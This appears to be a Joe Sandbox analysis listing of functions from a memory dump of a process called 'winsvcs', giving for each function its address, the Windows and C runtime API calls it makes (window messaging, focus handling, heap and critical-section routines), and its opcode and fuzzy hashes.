Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ClientScreen$MoveParentWindow
String ID:
API String ID: 2420994850-0
Opcode ID: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
Instruction ID: cb2595f71ca4477885d93d82fefb541c649833f727a180719ed1214593514184
Opcode Fuzzy Hash: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
Instruction Fuzzy Hash: 0B214C72104202AFD701DF55DC84AABFBE8FF88350F04892DF98887260D771AC51CB65

Function 004290C5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004290ED

Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810

__getptd.LIBCMT ref: 004290F7

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429105
__getptd.LIBCMT ref: 00429113
__getptd.LIBCMT ref: 0042911E
_CallCatchBlock2.LIBCMT ref: 00429144

Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5

Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58

Function 00415189 Relevance: 7.7, APIs: 5, Instructions: 243COMMON

Download Yara Rule

APIs

SetLayeredWindowAttributes.USER32 ref: 0041525D

Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790

GetClientRect.USER32(?,?), ref: 0041541E
GetClientRect.USER32(?,?), ref: 0041542B
GetParent.USER32(?), ref: 00415454
CreateAcceleratorTableA.USER32(?,00000001), ref: 0041549D

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ClientRect$AcceleratorAttributesCreateCriticalInitializeLayeredParentSectionTableWindow
String ID:
API String ID: 3375822417-0
Opcode ID: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
Instruction ID: 6c39a8f56b411056154fd32cd0cf0432356b21fcc375bf42b615943a6af84bd3
Opcode Fuzzy Hash: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
Instruction Fuzzy Hash: 45A10271605B01DFD750CF29C484B9ABBE0FF88714F148A6EE8899B351D7B5E881CB86

Function 00418DF0 Relevance: 7.6, APIs: 5, Instructions: 140stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
lstrlenW.KERNEL32(00000000), ref: 00418E26
_malloc.LIBCMT ref: 00418E87
WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D

Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$ByteCharEnterErrorFreeHeapLastLeaveMultiWide___sbh_find_block___sbh_free_block__lock_malloclstrlen
String ID:
API String ID: 2649083834-0
Opcode ID: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
Instruction ID: ef69da5e920178eb1dcc70a03244176e842f214767484c64cd14ef8785300be5
Opcode Fuzzy Hash: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
Instruction Fuzzy Hash: 6E41E271B002159BDB048EA89C80BAB77669B94314F04827EFD18DB391DE78DD4587C9

Function 00411720 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B2D0), ref: 0041172F
DestroyWindow.USER32(00000000,?,00000000,00000000,0040EE65), ref: 00411747
RtlLeaveCriticalSection.NTDLL(0044B2D0), ref: 00411784
RtlDeleteCriticalSection.NTDLL(0044A620), ref: 00411868
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00000000,00000000,0040EE65), ref: 00411884

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$DeleteDestroyEnterExceptionLeaveRaiseWindow
String ID:
API String ID: 337735902-0
Opcode ID: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
Instruction ID: 13516defa6da1fa1ea0f36df8edcfa91a04d8b774725dd04c741ba324b34f0a0
Opcode Fuzzy Hash: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
Instruction Fuzzy Hash: 974173B5600208EFDB10AF65E884B9777A9FF04314F04816AFD198B361E778ED80CB59

Function 004100C0 Relevance: 7.6, APIs: 5, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00410127
std::_String_base::_Xlen.LIBCPMT ref: 004100D5

Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D

std::_String_base::_Xlen.LIBCPMT ref: 0041014F
_memmove_s.LIBCMT ref: 0041018C
_memmove_s.LIBCMT ref: 004101D7

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 2104318304-0
Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9

Function 00418CB0 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
String ID:
API String ID: 2896116776-0
Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9

Function 00416E20 Relevance: 7.6, APIs: 5, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?,?,?,?,?,00415A10,?,?,?,00000001), ref: 00416F26

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Focus
String ID:
API String ID: 2734777837-0
Opcode ID: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
Instruction ID: bf3b8484ead40ab7a99336afcf803f5614de82c4d018cbf0b84b9aed1ee85005
Opcode Fuzzy Hash: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
Instruction Fuzzy Hash: DF418F70208200AFDF049F64D888BA67BA9FF49304F1945A9FD49CA2A6D774DC45CF25

Function 00416D50 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
GetFocus.USER32 ref: 00416DD9
IsChild.USER32(?,00000000), ref: 00416DE3
GetWindow.USER32(?,00000005), ref: 00416DF2
SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Focus$ChildWindow
String ID:
API String ID: 501040988-0
Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65

Function 00423CD9 Relevance: 7.6, APIs: 5, Instructions: 68memorylibraryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
HeapFree.KERNEL32(00000000), ref: 00423D76

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
String ID:
API String ID: 354369530-0
Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68

Function 00411E98 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(?,?), ref: 00411EA9
GetWindowLongA.USER32(?,000000FC), ref: 00411EBD
CallWindowProcA.USER32(?,?,?,?,?), ref: 00411ED4
GetWindowLongA.USER32(?,000000FC), ref: 00411EEE
SetWindowLongA.USER32(?,000000FC,?), ref: 00411F02

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
Instruction ID: f482abc3086895b13e65d7ed397f34a26d7f9aa96c4cf6a1d5cca4a790af85b8
Opcode Fuzzy Hash: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
Instruction Fuzzy Hash: 02212775508100EFCB008F18D984956BFB1FF98321B2486A6FD599A3BAC335DD52DB58

Function 0042BBDE Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042BBEA

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__amsg_exit.LIBCMT ref: 0042BC0A
__lock.LIBCMT ref: 0042BC1A
InterlockedDecrement.KERNEL32(?), ref: 0042BC37
InterlockedIncrement.KERNEL32(00449610), ref: 0042BC62

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
Instruction ID: 52685b4dcb39849911ff3693f870a45c18f8edff1e4251c2b4a25b8dbaeea7ec
Opcode Fuzzy Hash: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
Instruction Fuzzy Hash: CB01A532B00A31ABDA10AB66B80634A7360EB00720F86401FE810B3380CB28AC81DBDD

Function 0042592A Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00425948

Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2

___sbh_find_block.LIBCMT ref: 00425953
___sbh_free_block.LIBCMT ref: 00425962
HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D

Function 0040F626 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F637
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F64E
GetModuleHandleA.KERNEL32(00000000), ref: 0040F656
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F670
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F686

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
Instruction ID: a6e47eae5d4f7697fc9870831a46e4352dda564a31e996fcfd64f3f94e2429e5
Opcode Fuzzy Hash: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
Instruction Fuzzy Hash: 64F037B4648300BFE3708B609C85FE777A9E784B01F109968F695966C0C6B458429B29

Function 0040F841 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F476 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D

Function 0040F42E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D

Function 0040F8DD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F889 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D

Function 0040F4BE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D

Function 0040F54E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D

Function 0040F96D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D

Function 0040F506 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D

Function 0040F925 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962

Memory Dump Source

